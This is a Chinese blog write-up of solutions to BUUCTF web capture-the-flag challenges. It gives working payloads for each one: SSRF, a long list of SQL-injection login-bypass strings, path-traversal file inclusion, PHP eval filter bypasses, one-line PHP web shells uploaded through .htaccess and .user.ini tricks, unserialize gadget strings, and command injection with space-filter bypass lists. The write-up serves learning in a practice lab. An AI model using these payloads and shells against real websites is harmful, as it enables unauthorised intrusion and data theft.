BUUCTF-web

已于 2022-07-24 17:44:35 修改
阅读量389 收藏 2
点赞数
分类专栏: CTF 文章标签: web
于 2022-07-21 21:02:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43896504/article/details/125919888
版权

BUUCTF web部分

[第二章 web进阶]SSRF Training(URLs)

payload:http://a:@127.0.0.1:80@baidu.com/flag.php

[极客大挑战 2019]EasySQL(SQL注入)

2d2e5be7-2a7d-41cd-9345-a7d45b8d42aa.node4.buuoj.cn:81/check.php
?username=' or 1='1&password=' or 1='1

常见的万能密码:

’ or 1=‘1
‘or’=‘or’
admin
admin’–
admin’ or 4=4–
admin’ or ‘1’=‘1’–
admin888
"or “a”="a
admin’ or 2=2#
a’ having 1=1#
a’ having 1=1–
admin’ or ‘2’=‘2
‘)or(‘a’=‘a
or 4=4–
c
a’or’ 4=4–
"or 4=4–
‘or’a’=‘a
“or”="a’=‘a
‘or’’=’
‘or’=‘or’
1 or ‘1’=‘1’=1
1 or ‘1’=‘1’ or 4=4
‘OR 4=4%00
"or 4=4%00
‘xor
admin’ UNION Select 1,1,1 FROM admin Where ‘’=’
1
-1%cf’ union select 1,1,1 as password,1,1,1 %23
1
17…admin’ or ‘a’='a 密码随便
‘or’=‘or’
‘or 4=4/*
something
’ OR ‘1’=‘1
1’or’1’=‘1
admin’ OR 4=4/*
1’or’1’='1

[HCTF 2018]WarmUp(文件读取/包含)

(1)打开网址,发现只有一个图片,查看源码,发现有一个source.php 在这里插入图片描述
(2)输入/source.php,打开发现网页代码,又发现了一个hint.php
在这里插入图片描述
(3)输入/hint.php,再次打开发现提示,flag在ffffllllaaaagggg中
在这里插入图片描述
(4)发现是文件包含,然后查看即可,输入

URL/?file=hint.php?/../../../../ffffllllaaaagggg
//URL是题目网址

[极客大挑战 2019]Havefun

(1)查看码源发现代码

<!--
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        }
-->

(2)发现GET cat=dog 时,可以获取flag,输入

ee95f70c-ecb4-4c79-8f7a-4ff8eb878fae.node4.buuoj.cn:81/?cat=dog

[RoarCTF 2019]Easy Calc(WAF+var_dump)

分析题目:查看码源之后呢,发现有一个calc.php,还提示说WAF,百度查看WAF是不允许num传入字母,但php在解析的时候,会先把空格给去掉,那可以在num前加个空格来绕过WAF。

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

(1)用scandir()列出参数目录 中的文件和目录,也就是是scandir(“/”),但是“/”被过滤了,所以用chr(“47”)绕过,发现flag文件。
输入:

node4.buuoj.cn:25749/calc.php? num=1;var_dump(scandir(chr(47)))
/*以下两种都可以
? num=print_r(scandir('/'));
? num=var_dump(scandir('/'));
*/

(2)发现有flagg,输入,获得flag

node4.buuoj.cn:25749/calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
/*
? num=print_r(scandir('/flagg'));
? num=var_dump(scandir('/flagg'));
*/

在这里插入图片描述

[极客大挑战 2019]Upload(文件上传)

1)上传:
GIF89a <script language='php'>@eval($_POST[1]);</script>2)修改:抓包修改为 phtml ,并且修改Content-Type: image/png
(3)访问:/upload/one.phtml
(4)POST:1=system('ls /');
		  1=system('cat .flag');

[SUCTF 2019]CheckIn(文件上传)

1)上传shell.png:
	GIF89a
	auto_prepend_file="shell.png"2)上传.user.ini:
	GIF89a
	<script language='php'>@eval($_POST[1]);</script>
	//先以png格式上传,后再抓包删除 .png3)访问:http://2d2e3c0d-59b3-40cf-a8e3-f594a7c0f55d.node4.buuoj.cn:81
/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php
(4)连接蚁剑

[NPUCTF2020]ReadlezPHP(反序列化)

(1)查看码源,发现有一个/time.php?source点击去发现代码

<?php
#error_reporting(0);
class HelloPhp{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;
if(isset($_GET['source'])){
    highlight_file(__FILE__);
    die(0);
}
@$ppp = unserialize($_GET["data"]);

(2)反序列化:

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
		$this->a="phpinfo()";
        $this->b="assert";
    }
}
$c = new HelloPhp();
echo serialize($c);
?>
//得出:O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

(3)访问:/time.php?data=O:8:“HelloPhp”:2:{s:1:“a”;s:9:“phpinfo()”;s:1:“b”;s:6:“assert”;},查找flag。

[ACTF2020 新生赛]BackupFile(文件备份)

(1)看了一眼题目,是备份文件,一般有 /index.php.bak,www.zip,/.bak,试了一下是/index.php.bak
(2)下载之后,打开发现key=123即可获得flag。

[极客大挑战 2019]BuyFlag(字符绕过+长度)

(1)根据页面提示发现flag要支付购买,点击购买页面发现有一个pay.php,查看源码,要POST money和password

	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
//money=100000000&password=404

(2)直接POST会提示错误,因为身份不对,抓包分析,当Cookie:user=0时,身份错误,所以修改为1。
(3)继续提交发现,还是不对,password要不是数字,所以用password=404a绕过。
(4)继续提交发现,长度过长,所以用money=10e8绕过。
(5)获得flag。
在这里插入图片描述

[HCTF 2018]admin

直接登录,即可获得flag,如果失败的话,抓包试一下,修改登录身份即可。

[BJDCTF2020]Easy MD5(SQL注入+MD5)

(1)题目叫做md5,然后需要输入密码,输入ffifdyop

ffifdyop 字符串被MD5 哈希之后会面成276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ‘ or ‘6。
而 Mysql 刚好又会吧 hex 转成 ascii 解释,因此拼接之后的形式是1select * from ‘admin’ where password=‘’ or ‘6xxxxx’,形成了or 这么一个永真式 ,等价于万能密码。

(2)进入页面,提示“Do you like MD5?”,查看源码,需要GET a和b的值不相等且md5哈希后相等,用数组绕过/进制绕过,输入?a[]=1&b[]=2,进入下一个页面。
(3)再次查看源码,发现需要POST param1和param2的值不相等且md5哈希后相等,用数组绕过/进制绕过。POST:param1[]=1&param2[]=2,获取flag。

[ZJCTF 2019]NiZhuanSiWei(data、file伪协议+PHP反序列化)

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

(1)下面这句if是如果text=welcome to the zjctf的话,就执行下一步。但是有file_get_contents存在,用data伪协议绕过。

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))
//payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

(2)第二句if是如果file=useless.php,用file伪协议绕过。

if(preg_match("/flag/",$file))
//payload: file=php://filter/read=convert.base64-encode/resource=useless.php
//其实也不用,也可以直接是: file=useless.php

(3)用反序列话,运行脚本,最终的payload。

$password = unserialize($password);

脚本:

<?php  
class Flag{  //flag.php  
    public $file="flag.php";  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
$a = new Flag();
echo serialize($a);
?>

(4)最后的payload,查看源码,获得flag。

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

[MRCTF2020]你传你🐎呢(.htaccess+文件上传)

(1)这题是文件上传,先上传 .png 格式,发现是可以的。再试试上传 .php,发现不可以,但是 .php… 就可以,但是蚁剑连接失败。
(2)百度之后,用 .htaccess可以实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。
(3)上传 .htaccess (没有后缀哦)

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

(4)上传一句话木马,叫1.png(与上面同名)

<?=@eval($_POST[1])?>

(5)连接蚁剑,获取flag。

[GXYCTF2019]Ping Ping Ping(命令执行)

?ip=127.0.0.1;1)输入后发现有应答
?ip=127.0.0.1;ls;2)查询目录
?ip=127.0.0.1;cat flag.php;
//查询失败,过滤了空格
?ip=127.0.0.1;cat$IFS$flag.php;
//失败,过滤了flag
?ip=127.0.0.1;b=a;cat$IFS$fl$bg.php
//获得flag

绕过cat 用 tac more less head tac tail nl od(二进制查看) vi vim sort uniq
绕过空格用 %09  <>   ${IFS}    $IFS$9   {cat,fl*}   %20
绕过flag用 f*
绕过 ; 用 ?>
喜气杨杨❀
关注
专栏目录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 4382
BUUCTF--Web篇详细wp。
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2462
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
BUUCTF--Web篇详细wp_buuctfweb
最新发布
2401_84247617的博客
05-16 996
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
BUUCTFWeb题解
xuanyulevel6的博客
08-08 5175
BUUCTFWeb题解
BUUCTF Web】WriteUp超详细
qq_62604985的博客
07-10 1884
buutctf web题目题解, 升大三的暑假自己刷来提高能力的,是自己边做边写,暑假期间只要没事情,每天都会写一些题目,最迟晚上更新
BUUCTF web 系列详解 (详细版)持续更新中
llki666的博客
12-27 1857
mb_strpos为查找某值第一次出现的位置,这里表示截取page从0开始到第一个问号之间的字符 串,赋值给_page*/万能密码:1 and 1=1(数字型) 或1' and '1'='1(字符型)或 1 or 1=1(数字型) 或 1 or '1'='1(字符型)/*mb_substr为截断函数,第一个参数为传进来的字符串,第二个为起始位置,第三个参数为长度。mb_substr("abbcv", 0, 2)从第0个位置开始,截取前2个字符串 // 输出:ab。函数截取其中的问号位置之前的子串。
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF部分web题目
05-06
写题记录
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF刷题】Web解题方法总结(一)
Y1seco的博客
03-28 5158
文章目录1.堆叠注入,原理2.SQL缺省代码审计SQL注入 1.堆叠注入,原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FRO
2024年2024网络安全技术自学路线图及职业选择方向_网安学习路线图(4),2024年最新高级网络安全面试答案
2401_84254418的博客
05-05 627
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。伴随国家新基建战略的推行,人工智能、大数据、云计算、物联网、5G 等新兴技术的高速发展,层出不穷的新型黑客攻击手法也随之而来,无数政府单位被定向攻击、企业核心数据被盗、个人敏感信息泄露。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。
BUUCTF中**web**总结合集(正在更新中)
m0_64169451的博客
05-04 1131
buuctfweb练习题做题总结
BUUCTF_Web题目题解记录2
Altering_Ji的博客
07-11 920
记录三道做过的buu CTF刷题平台上的web类型题目,[MRCTF2020]Ez_bypass、[极客大挑战 2019]BuyFlag、[MRCTF2020]你传你🐎呢,考点包括代码审计和文件上传等
BUUCTF解题web十一道
qq_45837896的博客
05-26 1297
[2019极客大挑战]EASYSQL 到页面里发现是一个登录框 回想注入思路,先判断注入类型,然后尝试登陆绕过 使用万能密码username=’ or 1=1 or ‘1’=‘1’# &password=asd [2019极客大挑战]HAVEFUN 打开页面发现是一只猫猫,点了两下拖了两下发现没什么 然后老规矩F12查看有没有提示信息 发现有这么一段代码,可以对页面传参cat,传cat='dog’就执行了一段代码,不知道是什么,尝试了一下直接出了flag… [SUCTF]EASYSQL 进入发现是
BUUCTFWeb 解析(一)
Flag少侠的博客
05-03 1868
[极客大挑战 2019] EasySQL、[极客大挑战 2019] Havefun、[HCTF 2018] WarmUp、[ACTF2020 新生赛] Include、[ACTF2020 新生赛] Exec、[GXYCTF2019] Ping Ping Ping、[SUCTF 2019] EasySQL、[强网杯 2019] 随便注
BUUCTF——Web1
2201_75331136的博客
07-17 684
打开靶机,出现以下页面查看源代码发现Secret.php,访问后出现以下页面接着我们使用bp进行抓包在请求头中添加字段发送请求,出现以下页面根据提示更改User-Agent为发送请求,出现以下页面提示要是来自本地的访问请求,联想到127.0.0.1,需要X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。出现flagflag为。
BUUCTF——Web_buuctfweb(1),网络安全程序员最新职业规划
2401_84160272的博客
04-09 812
47721036)][外链图片转存中…(img-JlgsUHvn-1712647721036)][外链图片转存中…(img-9laKYJKn-1712647721036)][外链图片转存中…(img-cAIC4VoH-1712647721037)][外链图片转存中…(img-7Oo0jmkn-1712647721037)][外链图片转存中…(img-Ivky9qgA-1712647721037)]
BUUCTF_N1BOOK_[第二章 web进阶]文件上传_详解
weixin_43852034的博客
03-04 1029
最后的小插曲:本来以为上传成功之后,用蚁剑砍进去就完事儿了,结果发现居然会报错:嗯???于是直接访问一下上传后的文件:没想到直接得到了flag…后续又把2.php.xxx文件的内容修改为?尝试了一下,发现访问后也是同样的效果。那大概是环境本身做了限制吧…思路应该是没错的,蚁剑虽然说没砍进去…但你就说flag拿没拿到吧!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值